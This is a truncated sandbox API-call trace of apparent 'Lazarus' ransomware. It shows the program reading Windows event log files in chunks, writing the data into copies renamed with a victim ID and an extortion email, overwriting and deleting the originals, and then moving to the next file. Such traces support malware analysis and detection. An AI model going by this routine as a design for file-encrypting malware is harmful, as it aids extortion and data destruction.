[0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0087.732] GetLastError () returned 0x0 [0087.732] SetLastError (dwErrCode=0x0) [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0087.732] GetLastError () returned 0x0 [0087.732] SetLastError (dwErrCode=0x0) [0087.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0087.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0087.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a9b0 [0087.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0087.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0087.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0087.733] AreFileApisANSI () returned 1 [0087.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6a9b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0087.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5fe78 [0087.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6a9b0, cbMultiByte=-1, lpWideCharStr=0x5fe78, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Setup.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 81 [0087.733] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\setup.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.733] GetFileType (hFile=0x424) returned 0x1 [0087.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0087.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0087.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0087.734] AreFileApisANSI () returned 1 [0087.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0087.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7a8a8 [0087.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x7a8a8, cchWideChar=19 | out: lpWideCharStr="C:\\Logs\\Setup.evtx") returned 19 [0087.734] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.828] GetFileType (hFile=0x41c) returned 0x1 [0087.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a8a8 | out: hHeap=0x20000) returned 1 [0087.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0087.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.828] GetLastError () returned 0x0 [0087.828] SetLastError (dwErrCode=0x0) [0087.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.828] GetLastError () returned 0x0 [0087.828] SetLastError (dwErrCode=0x0) [0087.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x53970 [0087.828] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0087.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0087.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0087.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0087.830] GetLastError () returned 0x0 [0087.830] SetLastError (dwErrCode=0x0) [0087.831] GetLastError () returned 0x0 [0087.831] SetLastError (dwErrCode=0x0) [0087.831] GetLastError () returned 0x0 [0087.831] SetLastError (dwErrCode=0x0) [0087.831] GetLastError () returned 0x0 [0087.831] SetLastError (dwErrCode=0x0) [0087.831] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.831] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.833] GetLastError () returned 0x0 [0087.833] SetLastError (dwErrCode=0x0) [0087.833] GetLastError () returned 0x0 [0087.833] SetLastError (dwErrCode=0x0) [0087.833] GetLastError () returned 0x0 [0087.833] SetLastError (dwErrCode=0x0) [0087.833] GetLastError () returned 0x0 [0087.833] SetLastError (dwErrCode=0x0) [0087.833] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.833] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.833] GetLastError () returned 0x0 [0087.833] SetLastError (dwErrCode=0x0) [0087.834] GetLastError () returned 0x0 [0087.834] SetLastError (dwErrCode=0x0) [0087.834] GetLastError () returned 0x0 [0087.834] SetLastError (dwErrCode=0x0) [0087.834] GetLastError () returned 0x0 [0087.834] SetLastError (dwErrCode=0x0) [0087.834] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.834] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.834] GetLastError () returned 0x0 [0087.834] SetLastError (dwErrCode=0x0) [0087.834] GetLastError () returned 0x0 [0087.834] SetLastError (dwErrCode=0x0) [0087.835] GetLastError () returned 0x0 [0087.835] SetLastError (dwErrCode=0x0) [0087.835] GetLastError () returned 0x0 [0087.835] SetLastError (dwErrCode=0x0) [0087.835] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.835] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.835] GetLastError () returned 0x0 [0087.835] SetLastError (dwErrCode=0x0) [0087.835] GetLastError () returned 0x0 [0087.835] SetLastError (dwErrCode=0x0) [0087.835] GetLastError () returned 0x0 [0087.835] SetLastError (dwErrCode=0x0) [0087.836] GetLastError () returned 0x0 [0087.836] SetLastError (dwErrCode=0x0) [0087.836] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.836] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.836] GetLastError () returned 0x0 [0087.836] SetLastError (dwErrCode=0x0) [0087.836] GetLastError () returned 0x0 [0087.836] SetLastError (dwErrCode=0x0) [0087.836] GetLastError () returned 0x0 [0087.836] SetLastError (dwErrCode=0x0) [0087.836] GetLastError () returned 0x0 [0087.836] SetLastError (dwErrCode=0x0) [0087.837] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.837] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.837] GetLastError () returned 0x0 [0087.837] SetLastError (dwErrCode=0x0) [0087.837] GetLastError () returned 0x0 [0087.837] SetLastError (dwErrCode=0x0) [0087.837] GetLastError () returned 0x0 [0087.837] SetLastError (dwErrCode=0x0) [0087.837] GetLastError () returned 0x0 [0087.837] SetLastError (dwErrCode=0x0) [0087.837] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.838] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.838] GetLastError () returned 0x0 [0087.838] SetLastError (dwErrCode=0x0) [0087.838] GetLastError () returned 0x0 [0087.838] SetLastError (dwErrCode=0x0) [0087.838] GetLastError () returned 0x0 [0087.838] SetLastError (dwErrCode=0x0) [0087.838] GetLastError () returned 0x0 [0087.838] SetLastError (dwErrCode=0x0) [0087.838] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.839] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.839] GetLastError () returned 0x0 [0087.839] SetLastError (dwErrCode=0x0) [0087.839] GetLastError () returned 0x0 [0087.839] SetLastError (dwErrCode=0x0) [0087.839] GetLastError () returned 0x0 [0087.839] SetLastError (dwErrCode=0x0) [0087.839] GetLastError () returned 0x0 [0087.839] SetLastError (dwErrCode=0x0) [0087.839] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.839] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.840] GetLastError () returned 0x0 [0087.840] SetLastError (dwErrCode=0x0) [0087.840] GetLastError () returned 0x0 [0087.840] SetLastError (dwErrCode=0x0) [0087.840] GetLastError () returned 0x0 [0087.840] SetLastError (dwErrCode=0x0) [0087.840] GetLastError () returned 0x0 [0087.840] SetLastError (dwErrCode=0x0) [0087.840] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.840] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.841] GetLastError () returned 0x0 [0087.841] SetLastError (dwErrCode=0x0) [0087.841] GetLastError () returned 0x0 [0087.841] SetLastError (dwErrCode=0x0) [0087.841] GetLastError () returned 0x0 [0087.841] SetLastError (dwErrCode=0x0) [0087.841] GetLastError () returned 0x0 [0087.841] SetLastError (dwErrCode=0x0) [0087.841] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.841] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.841] GetLastError () returned 0x0 [0087.841] SetLastError (dwErrCode=0x0) [0087.842] GetLastError () returned 0x0 [0087.842] SetLastError (dwErrCode=0x0) [0087.842] GetLastError () returned 0x0 [0087.842] SetLastError (dwErrCode=0x0) [0087.842] GetLastError () returned 0x0 [0087.842] SetLastError (dwErrCode=0x0) [0087.842] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.842] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.842] GetLastError () returned 0x0 [0087.842] SetLastError (dwErrCode=0x0) [0087.843] GetLastError () returned 0x0 [0087.843] SetLastError (dwErrCode=0x0) [0087.843] GetLastError () returned 0x0 [0087.843] SetLastError (dwErrCode=0x0) [0087.843] GetLastError () returned 0x0 [0087.843] SetLastError (dwErrCode=0x0) [0087.843] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.843] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.843] GetLastError () returned 0x0 [0087.843] SetLastError (dwErrCode=0x0) [0087.844] GetLastError () returned 0x0 [0087.844] SetLastError (dwErrCode=0x0) [0087.844] GetLastError () returned 0x0 [0087.844] SetLastError (dwErrCode=0x0) [0087.844] GetLastError () returned 0x0 [0087.844] SetLastError (dwErrCode=0x0) [0087.844] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.844] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.844] GetLastError () returned 0x0 [0087.844] SetLastError (dwErrCode=0x0) [0087.845] GetLastError () returned 0x0 [0087.845] SetLastError (dwErrCode=0x0) [0087.845] GetLastError () returned 0x0 [0087.845] SetLastError (dwErrCode=0x0) [0087.845] GetLastError () returned 0x0 [0087.845] SetLastError (dwErrCode=0x0) [0087.845] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.845] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.845] GetLastError () returned 0x0 [0087.845] SetLastError (dwErrCode=0x0) [0087.845] GetLastError () returned 0x0 [0087.845] SetLastError (dwErrCode=0x0) [0087.846] GetLastError () returned 0x0 [0087.846] SetLastError (dwErrCode=0x0) [0087.846] GetLastError () returned 0x0 [0087.846] SetLastError (dwErrCode=0x0) [0087.846] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0087.846] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0087.846] GetLastError () returned 0x0 [0087.846] SetLastError (dwErrCode=0x0) [0087.846] GetLastError () returned 0x0 [0087.846] SetLastError (dwErrCode=0x0) [0087.846] GetLastError () returned 0x0 [0087.846] SetLastError (dwErrCode=0x0) [0087.847] GetLastError () returned 0x0 [0087.847] SetLastError (dwErrCode=0x0) [0087.847] ReadFile (in: hFile=0x41c, lpBuffer=0x53970, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x53970*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0087.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0087.847] WriteFile (in: hFile=0x424, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327ef70*=0x1000, lpOverlapped=0x0) returned 1 [0087.847] GetLastError () returned 0x0 [0087.847] SetLastError (dwErrCode=0x0) [0087.847] GetLastError () returned 0x0 [0087.847] SetLastError (dwErrCode=0x0) [0087.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0087.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0087.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0087.847] CloseHandle (hObject=0x424) returned 1 [0087.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53970 | out: hHeap=0x20000) returned 1 [0087.850] CloseHandle (hObject=0x41c) returned 1 [0087.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0087.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.850] AreFileApisANSI () returned 1 [0087.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0087.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7ac38 [0087.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x7ac38, cchWideChar=19 | out: lpWideCharStr="C:\\Logs\\Setup.evtx") returned 19 [0087.850] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0087.851] GetFileType (hFile=0x41c) returned 0x1 [0087.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac38 | out: hHeap=0x20000) returned 1 [0087.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x53970 [0087.852] GetLastError () returned 0xb7 [0087.852] SetLastError (dwErrCode=0xb7) [0087.852] WriteFile (in: hFile=0x41c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0087.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53970 | out: hHeap=0x20000) returned 1 [0087.853] CloseHandle (hObject=0x41c) returned 1 [0087.853] AreFileApisANSI () returned 1 [0087.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0087.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7a7b8 [0087.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x887e8, cbMultiByte=-1, lpWideCharStr=0x7a7b8, cchWideChar=19 | out: lpWideCharStr="C:\\Logs\\Setup.evtx") returned 19 [0087.853] DeleteFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx")) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a7b8 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0087.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.855] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x8de25170, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x1, dwReserved1=0x0, cFileName="System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cAlternateFileName="SYSTEM~1.LAZ")) returned 1 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0087.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0087.855] RtlAllocateHeap 